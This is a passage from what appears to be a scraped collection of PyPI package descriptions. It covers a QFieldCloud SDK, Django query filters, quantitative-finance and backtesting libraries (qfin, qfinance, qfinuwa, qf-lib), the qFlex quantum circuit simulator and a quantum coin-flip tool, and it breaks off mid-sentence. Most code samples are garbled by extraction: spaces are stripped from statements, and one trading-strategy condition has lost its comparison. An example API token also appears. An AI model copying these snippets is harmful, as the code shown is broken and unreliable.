Then:python -m pip install qfieldcloud-sdkCLI usageThe package also ships with the official QFieldCloud CLI tool.Usageqfieldcloud-cli [OPTIONS] COMMAND [ARGS]...Examples# logs in user \"user\" with password \"pass\"qfieldcloud-cliloginuserpass# gets the projects of user \"user\" with password \"pass\" at \"https://localhost/api/v1/\"qfieldcloud-cli-uuser-ppass-Uhttps://localhost/api/v1/list-projects# gets the projects of user authenticated with token `QFIELDCLOUD_TOKEN` at \"https://localhost/api/v1/\" as JSONexportQFIELDCLOUD_URL=https://localhost/api/v1/exportQFIELDCLOUD_TOKEN=017478ee2464440cb8d3e98080df5e5a\nqfieldcloud-cli--jsonlist-projectsMore detailed documentation can be foundhereModule usagefromimportsdkclient=sdk.Client(url=\"https://app.qfield.cloud/api/v1/\")client.login(username=\"user1\",password=\"pass1\",)projects=client.list_projects()>projectsProjects:0myusername/myproject11myusername/myproject2...DevelopmentContributions are more than welcome!Code styleCode style done withprecommit.pip install pre-commit\n# if you want to have git commits trigger pre-commit, install pre-commit hook:\npre-commit install\n# else run manually before (re)staging your files:\npre-commit run --all-filesCloning the projectOne time action to clone and setup:gitclonehttps://github.com/opengisch/qfieldcloud-sdk-pythoncdqfieldcloud-sdk-python# install dev dependenciespython3-mpipinstallpipenv\npre-commitinstall# install package in a virtual environmentpipenvinstall-rrequirements.txtTo run CLI interface for development purposes execute:pipenvshell# if your pipenv virtual environment is not active yetpython-mqfieldcloud_sdkTo ease development, you can set a.envfile. Therefore you can use directly theqfieldcloud-cliexecutable:cp .env.example .env\npipenv run qfieldcloud-cliBuilding the package# make sure your shell is sourced to no virtual environmentdeactivate# buildpython3-mbuild# now either activate your shell withpipenvshell# and install withpython-mpipinstall.--force-reinstall# or manually ensure it's pipenv and not your global pip doing the installationpipenvrunpipinstall.--force-reinstallVoil\u00e0!"} +{"package": "qfile", "pacakge-description": "A python library for simplifying common file operations. Check out thegithub pagefor more info."} +{"package": "qfilter", "pacakge-description": "No description available on PyPI."} +{"package": "qfilters", "pacakge-description": "__What it is:__A lightweight package for django which does the filtering of django querysets. The central object - a filter - is a callable that takes a queryset as a parameter and returns a queryset:filtered_queryset = filtr(Model.objects.all())Django itself has a similar object - Q-object (`django.db.models.Q`). Q-objects can be combined toghether (with `|`, `&` operations) or inverted (`~`) and then passed to `queryset.filter`.With `qfilters`, what you get in the most common case, is just a wrapper around the Q-object. However there are __2 features__ that may be the reasons to use the package:__1. 
Support for additional filter types.__For example, there is `ValuesDictFilter`, that is constructed from a field list, that will be passed to `queryset.values` and retrieve a list of dictionaries, and a filtering function, which accepts that dict as a parameter.This filters can be combined or inverted in the same way Q-objects do, so that using multiple filters would result in a single call to `queryset.values`.This is what it looks like in practice (all examples are taken from the `qfilter` testsuite):@ValuesDictFilter('@', fields_list=['traits__good_hunter'])def nas_i_zdes_neploho_kormyat(obj):return obj['traits__good_hunter'] is False # because it can be Nonecats = nas_i_zdes_neploho_kormyat(self.CatsBreed.objects.all())assert cats.exists()There are also exotic variants (`qfilters.exotic_types`) like `QuerysetIterationHook`, which appends attributes to objects when queryset is iterated over. Another one is `PropertyBasedFilter`, which can access object's attributes and even properties like it were a regular django model object. The implementation is not very straightforward, still it passes the tests so far. Here is what it looks like:class CatsBreed(models.Model):# ...traits = models.OneToOneField('Traits')class Traits(models.Model):#...weight_min = models.FloatField(u'\u0412\u0435\u0441 \u043e\u0442, \u043a\u0433', null=True)weight_max = models.FloatField(u'\u0412\u0435\u0441 \u0434\u043e, \u043a\u0433', null=True)# if you can't specify min and maxweight = models.FloatField(u'\u0412\u0435\u0441, \u043a\u0433', null=True)@propertydef kg(self):return self.weight or self.weight_maxfrom qfilters import PropertyBasedFilter@PropertyBasedFilter('@',fields_list=['traits__weight', 'traits__weight_max'],properties=['traits.kg'])def light_cats(obj):return not obj.traits.kg or obj.traits.kg < 3assert light_cats(CatsBreed.objects.all()).exists()__2. Using class as container: methods are filters__It is convenient to have an object, which can hold some context (for example, the view itself),and let the methods be filters, and be able to access this context. `qfilters.containers` provide this functionality, specifically, there is a `MethodFilter` class:from qfilter import MethodFilterclass ManyFilters(MethodFilter):def filter__q(self):return Q(name__in=[u'\u0421\u0438\u0430\u043c\u0441\u043a\u0430\u044f', u'\u041d\u043e\u0440\u0432\u0435\u0436\u0441\u043a\u0430\u044f \u043b\u0435\u0441\u043d\u0430\u044f'])@make_filter(PropertyBasedFilter,fields_list=['traits__weight', 'traits__weight_max'],properties=['traits.kg'])def filter__big(self, cat):return cat.traits.kg and cat.traits.kg > 5def filter__q_yet_another(self):return Q(name__in=[u'\u041f\u0435\u0440\u0441\u0438\u0434\u0441\u043a\u0430\u044f', u'\u041d\u043e\u0440\u0432\u0435\u0436\u0441\u043a\u0430\u044f \u043b\u0435\u0441\u043d\u0430\u044f'])filters = ManyFilters()cat = filters(CatsBreed.objects.all())[0]The idea was born from the experience of using the [django-rest-framework](http://www.django-rest-framework.org/). There is a notion of filter backend (a class) which every view knows about. First I implemented a simple method-based filter backend, the possible return values for the methods were eiher a Q-object or a queryset. But then I got difficulties with debugging since the return value doesn't even know which method it came from. Thus, I decided it will be a good idea to have this filter obbject.P.S. 
`qfilters` does not provide a filter backend to use with django-rest-framework, but it's a piece of cake to write one."} +{"package": "qfin", "pacakge-description": "Q-FinA Python library for mathematical finance.Installationhttps://pypi.org/project/QFin/pip install qfinVersion '>= 0.1.20'QFin is being reconstructed to leverage more principals of object-oriented programming. Several modules in this version are deprecated along with the solutions to PDEs/SDEs (mainly in the options module).QFin now contains a module called 'stochastics' which will be largely responsible for model calibration and option pricing. A Cython/C++ equivalent to QFin is also being constructed so stay tuned!Option Pricing(version >= 0.1.20)Stochastic differential equations that model underlying asset dynamics extend the 'StochasticModel' class and posses a list of model parameters and functions for pricing vanillas, calibrating to implied volatility surfaces, and Monte Carlo simulations (particularly useful after calibration for pricing path dependent options).Below is a trivial example using ArithmeticBrownianMotion - first import the StochasticModel...fromqfin.stochasticsimportArithmeticBrownianMotionNext initialize the class object by parameterizing the model...# abm parameterized by Bachelier vol = .3abm=ArithmeticBrownianMotion([.3])The abm may now be used to price a vanilla call/put option (prices default to \"CALL\") under the given parameter set...# F0 = 101# X = 100# T = 1abm.vanilla_pricing(101,100,1,\"CALL\")# Call Price: 1.0000336233656906Using call-put parity put prices may also be obtained...# F0 = 99# X = 100# T = 1abm.vanilla_pricing(99,100,1,\"PUT\")# Put Price: 1.0000336233656952Calibration and subsequent simulation of the process is also available - do note that some processes have a static volatility and can't be calibrated to an ivol surface.The arithmetic Brownian motion may be simulated as follows...# F0 = 100# n (steps) = 10000# dt = 1/252# T = 1abm.simulate(100,10000,1/252,1)Results of the simulation along with the simulation characteristics are stored under the tuple 'path_characteristics' : (paths, n, dt, T).Using the stored path characteristics we may find the price of a call just as before by averaging each discounted path payoff (assuming a stock process) with zero-rates we can avoid discounting as follows and find the option value as follows...# list of path payoffspayoffs=[]# option strike priceX=99# iteration through terminal path values to identify payoffforpathinabm.path_characteristics[0]:# appending CALL payoffpayoffs.append(max((path[-1]-X),0))# option value todaynp.average(payoffs)# Call Price: 1.0008974837343871We can see here that the simulated price is converging to the price in close-form.Option Pricing (version < 0.1.20)Black-Scholes PricingTheoretical options pricing for non-dividend paying stocks is available via the BlackScholesCall and BlackScholesPut classes.fromqfin.optionsimportBlackScholesCallfromqfin.optionsimportBlackScholesPut# 100 - initial underlying asset price# .3 - asset underlying volatility# 100 - option strike price# 1 - time to maturity (annum)# .01 - risk free rate of interesteuro_call=BlackScholesCall(100,.3,100,1,.01)euro_put=BlackScholesPut(100,.3,100,1,.01)print('Call price: ',euro_call.price)print('Put price: ',euro_put.price)Call price: 12.361726191532611\nPut price: 11.366709566449416Option GreeksFirst-order and some second-order partial derivatives of the Black-Scholes pricing model are available.DeltaFirst-order partial derivative with respect 
to the underlying asset price.print('Call delta: ',euro_call.delta)print('Put delta: ',euro_put.delta)Call delta: 0.5596176923702425\nPut delta: -0.4403823076297575GammaSecond-order partial derivative with respect to the underlying asset price.print('Call gamma: ',euro_call.gamma)print('Put gamma: ',euro_put.gamma)Call gamma: 0.018653923079008084\nPut gamma: 0.018653923079008084VegaFirst-order partial derivative with respect to the underlying asset volatility.print('Call vega: ',euro_call.vega)print('Put vega: ',euro_put.vega)Call vega: 39.447933090788894\nPut vega: 39.447933090788894ThetaFirst-order partial derivative with respect to the time to maturity.print('Call theta: ',euro_call.theta)print('Put theta: ',euro_put.theta)Call theta: -6.35319039407325\nPut theta: -5.363140560324083Stochastic ProcessesSimulating asset paths is available using common stochastic processes.Geometric Brownian MotionStandard model for implementing geometric Brownian motion.fromqfin.simulationsimportGeometricBrownianMotion# 100 - initial underlying asset price# 0 - underlying asset drift (mu)# .3 - underlying asset volatility# 1/52 - time steps (dt)# 1 - time to maturity (annum)gbm=GeometricBrownianMotion(100,0,.3,1/52,1)print(gbm.simulated_path)[107.0025048205179, 104.82320056538235, 102.53591127422398, 100.20213816642244, 102.04283245358256, 97.75115579923988, 95.19613943526382, 96.9876745495834, 97.46055174410736, 103.93032659279226, 107.36331603194304, 108.95104494118915, 112.42823319947456, 109.06981862825943, 109.10124426285238, 114.71465058375804, 120.00234814086286, 116.91730159923688, 118.67452601825876, 117.89233466917202, 118.93541257993591, 124.36106523035058, 121.26088015675688, 120.53641952983601, 113.73881043255554, 114.91724168548876, 112.94192281337791, 113.55773877160591, 107.49491796151044, 108.0715118831013, 113.01893111071472, 110.39204535739405, 108.63917240906524, 105.8520395233433, 116.2907247951675, 114.07340779267213, 111.06821275009212, 109.65530380775077, 105.78971667172465, 97.75385009989282, 97.84501925249452, 101.90695475825825, 106.0493833583297, 105.48266575656817, 106.62375752876223, 112.39829297429974, 111.22855058562658, 109.89796974828265, 112.78068777325248, 117.80550869036715, 118.4680557054793, 114.33258212280838]Stochastic Variance ProcessStochastic volatility model based on Heston's paper (1993).fromqfin.simulationsimportStochasticVarianceModel# 100 - initial underlying asset price# 0 - underlying asset drift (mu)# .01 - risk free rate of interest# .05 - continuous dividend# 2 - rate in which variance reverts to the implied long run variance# .25 - implied long run variance as time tends to infinity# -.7 - correlation of motion generated# .3 - Variance's volatility# 1/52 - time steps (dt)# 1 - time to maturity (annum)svm=StochasticVarianceModel(100,0,.01,.05,2,.25,-.7,.3,.09,1/52,1)print(svm.simulated_path)[98.21311553503577, 100.4491317019877, 89.78475515902066, 89.0169762497475, 90.70468848525869, 86.00821802256675, 80.74984494892573, 89.05033807013137, 88.51410029337134, 78.69736798230346, 81.90948751054125, 83.02502248913251, 83.46375102829755, 85.39018282900138, 78.97401642238059, 78.93505221741903, 81.33268688455111, 85.12156706038515, 79.6351983987908, 84.2375291273571, 82.80206517176038, 89.63659376223292, 89.22438477640516, 89.13899271995662, 94.60123239511816, 91.200165507022, 96.0578905115345, 87.45399399599378, 97.908745925816, 97.93068975065052, 103.32091104292813, 110.58066464778392, 105.21520242908348, 99.4655106985056, 106.74882010453683, 
112.0058519886151, 110.20930861932342, 105.11835510815085, 113.59852610881678, 107.13315204738092, 108.36549026977205, 113.49809943785571, 122.67910031073885, 137.70966794451425, 146.13877267735612, 132.9973784430374, 129.75750117504984, 128.7467891695649, 127.13115959080305, 130.47967713110302, 129.84273088908265, 129.6411527208744]Simulation PricingExotic OptionsSimulation pricing for exotic options is available under the assumptions associated with the respective stochastic processes. Geometric Brownian motion is the base underlying stochastic process used in each Monte Carlo simulation. However, should additional parameters be provided, the appropriate stochastic process will be used to generate each sample path.Vanilla Optionsfromqfin.simulationsimportMonteCarloCallfromqfin.simulationsimportMonteCarloPut# 100 - strike price# 1000 - number of simulated price paths# .01 - risk free rate of interest# 100 - initial underlying asset price# 0 - underlying asset drift (mu)# .3 - underlying asset volatility# 1/52 - time steps (dt)# 1 - time to maturity (annum)call_option=MonteCarloCall(100,1000,.01,100,0,.3,1/52,1)# These additional parameters will generate a Monte Carlo price based on a stochastic volatility process# 2 - rate in which variance reverts to the implied long run variance# .25 - implied long run variance as time tends to infinity# -.5 - correlation of motion generated# .02 - continuous dividend# .3 - Variance's volatilityput_option=MonteCarloPut(100,1000,.01,100,0,.3,1/52,1,2,.25,-.5,.02,.3)print(call_option.price)print(put_option.price)12.73812121792851\n23.195814963576286Binary Optionsfromqfin.simulationsimportMonteCarloBinaryCallfromqfin.simulationsimportMonteCarloBinaryPut# 100 - strike price# 50 - binary option payout# 1000 - number of simulated price paths# .01 - risk free rate of interest# 100 - initial underlying asset price# 0 - underlying asset drift (mu)# .3 - underlying asset volatility# 1/52 - time steps (dt)# 1 - time to maturity (annum)binary_call=MonteCarloBinaryCall(100,50,1000,.01,100,0,.3,1/52,1)binary_put=MonteCarloBinaryPut(100,50,1000,.01,100,0,.3,1/52,1)print(binary_call.price)print(binary_put.price)22.42462873441866\n27.869902820039087Barrier Optionsfromqfin.simulationsimportMonteCarloBarrierCallfromqfin.simulationsimportMonteCarloBarrierPut# 100 - strike price# 50 - binary option payout# 1000 - number of simulated price paths# .01 - risk free rate of interest# 100 - initial underlying asset price# 0 - underlying asset drift (mu)# .3 - underlying asset volatility# 1/52 - time steps (dt)# 1 - time to maturity (annum)# True/False - Barrier is Up or Down# True/False - Barrier is In or Outbarrier_call=MonteCarloBarrierCall(100,1000,150,.01,100,0,.3,1/52,1,up=True,out=True)barrier_put=MonteCarloBarrierCall(100,1000,95,.01,100,0,.3,1/52,1,up=False,out=False)print(binary_call.price)print(binary_put.price)4.895841997908933\n5.565856754630819Asian Optionsfromqfin.simulationsimportMonteCarloAsianCallfromqfin.simulationsimportMonteCarloAsianPut# 100 - strike price# 1000 - number of simulated price paths# .01 - risk free rate of interest# 100 - initial underlying asset price# 0 - underlying asset drift (mu)# .3 - underlying asset volatility# 1/52 - time steps (dt)# 1 - time to maturity (annum)asian_call=MonteCarloAsianCall(100,1000,.01,100,0,.3,1/52,1)asian_put=MonteCarloAsianPut(100,1000,.01,100,0,.3,1/52,1)print(asian_call.price)print(asian_put.price)6.688201154529573\n7.123274528125894Extendible 
Optionsfromqfin.simulationsimportMonteCarloExtendibleCallfromqfin.simulationsimportMontecarloExtendiblePut# 100 - strike price# 1000 - number of simulated price paths# .01 - risk free rate of interest# 100 - initial underlying asset price# 0 - underlying asset drift (mu)# .3 - underlying asset volatility# 1/52 - time steps (dt)# 1 - time to maturity (annum)# .5 - extension if out of the money at expirationextendible_call=MonteCarloExtendibleCall(100,1000,.01,100,0,.3,1/52,1,.5)extendible_put=MonteCarloExtendiblePut(100,1000,.01,100,0,.3,1/52,1,.5)print(extendible_call.price)print(extendible_put.price)13.60274931789973\n13.20330578685724"} +{"package": "qfinance", "pacakge-description": "QFinanceCopyright (c) 2023 Institute for Quantum Computing, Baidu Inc. All Rights Reserved.About QFinanceQFinanceis a Quantum Finance library based on theQComputeSDK. It provides a set of tools for building quantum algorithms for finance. Currently, it supports the following features:Pricing European options using Quantum Monte Carlo methodPricing European options using classical methods, includingBlack-Scholes-Merton methodClassical Monte Carlo methodThe following quantum algorithms are implemented inQFinance:Quantum Monte Carlo algorithm for simple piecewise linear payoff functionArbitrary quantum state preparationQuantum Fourier transformQuantum phase estimationQuantum amplitude estimation algorithms:Canonical Quantum Amplitude Estimation [Brassard 2002]Maximum Likelihood Amplitude Estimation [Suzuki 2019]Iterative Quantum Amplitude Estimation [Grinko 2019]InstallationQFinance is available on PyPI. To install the latest release, run:pipinstallqfinancepipwill handle all dependencies automatically.ExamplesOption PricingimportQComputeQCompute.Define.Settings.outputInfo=FalsefromQFinance.pricingimportEuropeanOptionPricingClassical,EuropeanCallQMC# set parameters# s0 is the current price of the underlying asset# k is the strike price# t is the time to maturity (in years)# r is the risk-free interest rate# sigma is the volatility of the underlying assets0=100k=90t=1r=0.05sigma=0.1########################################################################################option_classical=EuropeanOptionPricingClassical(s0,k,t,r,sigma,\"call\",\"long\")# option price calculated by Black-Scholes-Merton modelbsm_price=option_classical.bsm_price()option_classical.set_CMC_sample_size(1000000)# option price calculated by Classical Monte Carlo methodcmc_price=option_classical.cmc_price()option_classical.show_info()########################################################################################option=EuropeanCallQMC(s0,k,t,r,sigma)option.set_num_qubits(3)option.set_scaling(0.04)# set MLAE configurationoption.method=\"MLAE\"Q_powers=[2,3,5,10]shots=[100000]*len(Q_powers)price_qmc=option.get_price_mlae(Q_powers,shots)print(f\"BSM price:\\t{bsm_price:.5f}\")print(f\"CMC price:\\t{cmc_price:.5f}\")print(f\"QMC price:\\t{price_qmc:.5f}\")The typical output is as 
follows:Europeanoptionpricingwiththefollowingparameters:\noptiontype:call,long\ncurrentstockprice:s0=100strikeprice:k=90timetomaturity(inyears):t=1risk-freeinterestrate:r=0.05\nvolatility:sigma=0.1===================RunningMLAEalgorithm======================powersofQare:[2,3,5,10]numberofshotsare:[100000,100000,100000,100000]ApplyingQ^2tothestateA|0>^8...\nTimeelapsed:0.2348seconds.\n\nApplyingQ^3tothestateA|0>^8...\nTimeelapsed:0.3460seconds.\n\nApplyingQ^5tothestateA|0>^8...\nTimeelapsed:0.5540seconds.\n\nApplyingQ^10tothestateA|0>^8...\nTimeelapsed:1.0420seconds.=====================MLAEalgorithmfinished.====================BSMprice:14.62884\nCMCprice:14.62937\nQMCprice:14.62056LicenseQFinance uses theApache License 2.0."} +{"package": "qfinuwa", "pacakge-description": "QFIN's Algorithmic Backtester (QFAB)GitHub PageSetupTo install on your system, use pip:pip install qfinuwaAPI ClassTo pull market data ensure you have a text file with the API key and callAPI.fetch_stocks:fromqfinuwaimportAPIpath_to_API='API_key.txt'download_folder='./data'API.fetch_stocks(['AAPL','GOOG','TSLA'],path_to_API,download_folder)Indicator ClassMulti-IndicatorsA multi-indicator takes in a single signal (price of an arbitary stock) and outputs a transformation of that stock.It is calledMultiIndicatorbecause the indicator will have multiple values (one for each stock)# ExampleclassCustomIndicators(Indicators):@Indicators.MultiIndicatordefbollinger_bands(self,stock:pd.DataFrame):BOLLINGER_WIDTH=2WINDOW_SIZE=100mid_price=(stock['high']+stock['low'])/2rolling_mid=mid_price.rolling(WINDOW_SIZE).mean()rolling_std=mid_price.rolling(WINDOW_SIZE).std()return{\"upper_bollinger\":rolling_mid+BOLLINGER_WIDTH*rolling_std,\"lower_bollinger\":rolling_mid-BOLLINGER_WIDTH*rolling_std}Single-IndicatorsSimilar toMultiIndicator,SingleIndicatoris implemented as a function that takes in stock data and returns an indicator or indicators.It is calledSingleIndicatorbecause there is only a single signal.# ExampleclassCustomIndicators(Indicators):@Indicators.SingleIndicatordefetf(self,stock:dict):apple=0.2tsla=0.5goog=0.3return{'etf':apple*stock['AAPL']+tsla*stock['TSLA']+goog*stock['GOOG']}Manually TestingYou can manually test you indicators as follows:stock_a=pd.from_csv('stockA.csv')stock_b=pd.from_csv('stockA.csv')# multi-indicator for stockA (returns dict of dict of pd.Series)output_a=CustomIndicators.bollinger(stockA)# multi-indicator for stockB (returns dict of dict of pd.Series)output_b=CustomIndicators.bollinger(stockA)# single-indicator for stockA + stockB (returns dict of pd.Series)output=CustomIndicators.etf({'stockA':stock_a,'stockB':stock_b})Hyper-parametersEach function you implement can be thought of as a hyperparameter \"group\" that bundles the indicator it returns (the keys to the dictionary the indicator function returns).The backtester can change hyperparameters for you, but to do so you need to give each one a name, in the form ofkwargs.Thekwargsmust include a default value which will be used if you do not specify a 
value.classCustomIndicators(Indicators):@Indicators.MultiIndicatordefbollinger_bands(self,stock:pd.DataFrame,BOLLINGER_WIDTH=2,WINDOW_SIZE=100):mid_price=(stock['high']+stock['low'])/2rolling_mid=mid_price.rolling(WINDOW_SIZE).mean()rolling_std=mid_price.rolling(WINDOW_SIZE).std()return{\"upper_bollinger\":rolling_mid+BOLLINGER_WIDTH*rolling_std,\"lower_bollinger\":rolling_mid-BOLLINGER_WIDTH*rolling_std}@Indicators.SingleIndicatordefetf(self,stock:dict,apple=0.2,tsla=0.5,goog=0.3):return{'etf':apple*stock['AAPL']+tsla*stock['TSLA']+goog*stock['GOOG']}Strategy ClassTo define your strategy extendqfin.Strategyto inherit its functionalities. Implement your ownon_datafunction.Youron_datafunction will be expected to take 4 positional arguments.self: reference to this objectprices: a dictionary of numpy arrays of historical pricesportfolio: object that manages positionsSimilar toqfin.Indicators, you can define hyperparameters for your model in__init__.# Example StrategyclassBasicBollinger(Strategy):def__init__(self,quantity=5):self.quantity=quantityself.n_failed_orders=0defon_data(self,prices,indicators,portfolio):# If current price is below lower Bollinger Band, enter a long positionforstockinportfolio.stocks:if(prices['close'][stock][-1]indicators['upper_bollinger'][stock][-1]):order_success=portfolio.order(stock,quantity=-self.quantity)ifnotorder_success:self.n_failed_orders+=1defon_finish(self):# Added to results object - access using result.on_finishreturnself.n_failed_ordersAdditionally, you can specify a functionon_finishthat will run on the completion of a run, if you want to save your own data. Whatever this function returns will can be accessed in the results (seeSingleRunResults.on_finish).Backtester ClassTheBacktesterclass asks for a custom strategy, custom indicators and data from the user. 
Once created, it can run multiple backtests without having to recalculate the indicators - when used in a Notebook environment the backtester object can persist and incrementally updated with new values.Creating a BacktesterSeeqfinuwa.Backtesterdocstrings for specifics.fromqfinuwaimportBacktesterbacktester=Backtester(CustomStrategy,CustomIndicators,data=r'\\data',days=90,delta_limits=1000,fee=0.01)Updating Indicator ParametersUpdate Parametersbacktester.indicators.update_params(dict_of_updates)Get Current Parametersbacktester.indicators.paramsGet Defaultsbacktester.indicators.defaultsUpdating Classbacktester.indicators=NewIndicatorClassUpdating Strategy ParametersUpdate Parametersbacktester.strategy.update_params(dict_of_updates)Get Current Parametersbacktester.strategy.paramsGet Defaultsbacktester.strategy.defaultsUpdating Classbacktester.strategy=NewStrategyClassRunning a BacktesterTime Complexity AnalysisMIT LicenseCopyright (c) 2022 Isaac Bergl, QFIN UWAPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE."} +{"package": "qfitswidget", "pacakge-description": "No description available on PyPI."} +{"package": "qflash-auth-jwt-package", "pacakge-description": "Qflash JWT Packagea small package for implement jwt security in APIGetting StartedDependenciesYou need Python 3.7 or later to useqflash_jwt_package. You can find it atpython.org.FeaturesFile structure for PyPI packagesSetup with package informationsLicense example"} +{"package": "qflash-jwt-package", "pacakge-description": "Qflash JWT Packagea small package for implement jwt security in APIGetting StartedDependenciesYou need Python 3.7 or later to useqflash_jwt_package. You can find it atpython.org.FeaturesFile structure for PyPI packagesSetup with package informationsLicense example"} +{"package": "qflashlight", "pacakge-description": "No description available on PyPI."} +{"package": "qflexcirq", "pacakge-description": "qFlex: A flexible high-performance simulator for verifying and benchmarking quantum circuits implemented on real hardwareDescriptionFlexible Quantum Circuit Simulator (qFlex) implements an efficient tensor\nnetwork, CPU-based simulator of large quantum circuits. qFlex computes exact\nprobability amplitudes, a task that proves essential for the verification of\nquantum hardware, as well as mimics quantum machines by computing amplitudes\nwith low fidelity. 
qFlex targets quantum circuits in the range of sizes expected\nfor supremacy experiments based on random quantum circuits, in order to verify\nand benchmark such experiments.DocumentationqFlex scientific documentation and results can be found in[1],[2]and[3].\nFor technical documentation on how to\nuse qFlex, seeqflex/docs.[1]B. Villalonga,et al.,\"A flexible\nhigh-performance simulator for verifying and benchmarking quantum circuits\nimplemented on real hardware\", NPJ Quantum Information 5, 86 (2019)[2]B. Villalonga,et al.,\"Establishing\nthe Quantum Supremacy Frontier with a 281 Pflop/s Simulation\",\narXiv:1905.00444 (2019)[3]\"Quantum supremacy\nusing a programmable superconducting processor\",\nNature 574, 505\u2013510 (2019)Build methodsTo ensure cross-platform viability, qFlex supports multiple different build\nmethods. If one of the build methods below does not work on your system, try\nusing one of the other methods listed.Local installationTo build qFlex on your machine, simply run:$ autoreconf -i && autoconf && ./configure\n$ make && make run-testsTo disable qFlex python interface, use./configure --disable-pybind11.If missing, python modules can be installed as follows:$ python3 -m pip install -r scripts/requirements.txtAfter running these commands, qFlex can be installed by runningmake install.\nBy default, this installs qFlex in$HOME/local/. To change the installation\nfolder, use./configure --prefix=/new/installation/folder/.qFlex provides an experimental support forOpenMP. To activateOpenMP, run./configurewith the extra-option--enable-openmp.qFlex relies onOpenBLASfor optimized\nmatrix operations.For more information, seethe installation guide.Build Using DockerDockerallows you to run qFlex in an isolated environment,\nwithout having to worry about managing dependencies.To build qFlex with Docker, seethe Docker guide.An automated qFlex Docker container, synced with themasterbranch, can be\npulled from Docker Hub as:$ docker pull ngnrsaa/qflexBuild Using Rootless ContainersRootless containers are an alternative to Docker targeted at users who may not\nhaverootprivileges on their machine.To run qFlex in a rootless container, seeqflex/docs/rootless-container.md.Using Google CirqCirqis a framework for modeling and\ninvoking Noisy Intermediate Scale Quantum (NISQ) circuits.To run qFlex on Google Cirq circuits, or just to call the simulator from Python,\nseeqflex/docs/cirq_interface.md.LicenseCopyright \u00a9 2019, United States Government as represented by the Administrator\nof the National Aeronautics and Space Administration. All rights reserved.The Flexible Quantum Circuit Simulator (qFlex) framework is licensed under the\nApache License, Version 2.0 (the \"License\"); you may not use this application\nexcept in compliance with the License. You may obtain a copy of the License athttp://www.apache.org/licenses/LICENSE-2.0.Unless required by applicable law or agreed to in writing, software distributed\nunder the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR\nCONDITIONS OF ANY KIND, either express or implied. See the License for the\nspecific language governing permissions and limitations under the License."} +{"package": "qf-lib", "pacakge-description": "QF-LibWhat is QF-lib?QF-Libis a Python library that provides high quality tools for quantitative finance.\nA large part of the project is dedicated to backtesting investment strategies.\nThe Backtester uses anevent-driven architectureand simulates events such as daily market opening\nor closing. 
It is designed totest and evaluate any custom investment strategy.Main features include:Flexible data sourcing - the project supports the possibility of an easy selection of the data source. Currently provides financial data fromBloomberg,Quandl,Haver AnalyticsorPortara. To check if there are any additional dependencies necessary for any of these data providers please visitthe installation guide.Tools to prevent look-ahead bias in the backtesting environment.Adapteddata containers, which extend the functionality of pandasSeries'andDataframes.Summary generation - all performed studies can be summarized with a practical and informative document explaining the results.Several document templatesare available in the project.Simple adjustment of existing settings and creation of new functionalities.InstallationYou can installqf-libusing the pip command:pipinstallqf-libAlternatively, to install the library from sources, you can download the project and in the qf_lib directory\n(same one where you found this file after cloning the repository) execute the following command:pythonsetup.pyinstallPrerequisitesThe library usesWeasyPrintto export documents to PDF. WeasyPrint requires additional dependencies, check theplatform-specific instructions for Linux, macOS and Windows installation.In order to facilitate the GTK3+ installation process for Windows you can usefollowing installers. Download and run the latestgtk3-runtime-x.x.x-x-x-x-ts-win64.exefile to install the GTK3+.DocumentationInstallation guide:https://qf-lib.readthedocs.io/en/latest/installation.htmlConfiguration guide:https://qf-lib.readthedocs.io/en/latest/configuration.htmlAPI documentation:https://qf-lib.readthedocs.io/"} +{"package": "qflip-CQPANCOAST", "pacakge-description": "Quantum Coin FlipFlipping a coin is for losers; use quantum mechanics instead.InstallIt's on pypihere:pip install qflip-CQPANCOAST.\nTo uninstall,pip uninstall qflip-CQPANCOAST.I use this repository for Python packaging practice, as the function is so simple.The CodeHey,I'mnot a loser. What's going on?A lab at ANU is continually making measurements on the quantum vacuum and then putting binary versions of that up on the internet.Here it is!I originally wrote this code by adapting an html parser fromherefor my students in a Computational Methods in Physics class that I was a course assistant for, Spring 2019.\nThe script came later: flipping a coin was too deterministic for me, so I wrote a python script for the shell that gives me truly random quantum measurements!\nMost of the code is mine now, but I figure I should still credit the guy or gal.How do I use it?Just type in qflip and then the number of things you have to choose between.\nThe program will:take a huge number from the ANU quantum random number generator,split it into a bunch of still big ones),store those numbers in a json file in~/.qflip,and mod it by the number you specify.If you don't spefcify a number, it'll choose 2.$qflip0$qflip1$qflip1$qfilp2713$qflip0# This will throw a ValueError.$qflip-1# So will this...$qflipbeans# ...and this.$qflip1# This is fine, though not useful.0Need to decide what I'll have for dinner?\nIf I have four options, I just assign each of them a number from 0 to 3, and typeqflip 4into the prompt.Need to decide what homework assignment I'll do first?\nIf I have seventeen options... 
well, you get the point.The PhysicsNo, but really, what's going on here?First of all, there's no way of testing the experimentally, but many (including me) are of the opinion that thinking about this any other way requires mangling the beautiful, beautiful math.Here's what's up: in laymans terms, before we observe Schrodinger's cat, it is in a superposition of states: neither dead nor alive.\nThen, we open the box to make our observation.\nIt looksto uslike cat is now definitely alive or dead, but really,we have splitinto someone who saw the cat live and someone who saw the cat die, just like the cat had split earlier!\nThis isn't the place to go into how quantum mechanics works, but what you need to know is that there's atotally real other universewhere the numbers in the picture above are different.\nIsn't that cool?When I use this program to decide what shirt to wear, I end up wearing all of them \u2013 but it looks to me like I chose one.\nWe are part of the universe, and wealsofollow the strange laws of quantum mechanics.If you want further explanation, first do some reading on quantum mechanics (The Feynman Lecturesare always a great place to start), then check outHugh Everett's Theory of the Universal Wavefunction, more popularly known as the \"Many Worlds\" interpretation of quantum mechanics.Again, no way of testing this experimentally, but it sure makes the most sense to me.\nDebating interpretations of quantum mechanics is exhuasting, so if you're looking for arguments one way or the other, you're free to look online.Dear reader, there are 